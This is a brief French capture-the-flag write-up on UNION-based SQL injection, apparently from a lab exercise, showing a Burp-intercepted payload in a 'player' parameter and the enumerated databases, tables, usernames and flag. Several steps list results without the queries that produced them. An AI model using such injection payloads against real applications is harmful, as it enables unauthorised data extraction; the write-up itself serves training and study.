SQLI (UNION Injection) - Pentesting Web
Nous interceptons la requête avec Burp Suite et altérons la variable player :

jordan' union select database()-- -Le nom de la base de données est november.

Pour lister toutes les bases de données :
Résultat : mysql,information_schema,performance_schema,sys, november

Lister les tables de november :

Lister les colonnes de la table players :
Colonnes trouvées : player

Extraction des Données Utilisateur
Players trouvées : ippsec,celesian,big0us,luska,tinyboy

Extraction du flag :


Flag trouvé :
UHC{F1rst_5tep_2_Qualify}
Mis à jour
Ce contenu vous a-t-il été utile ?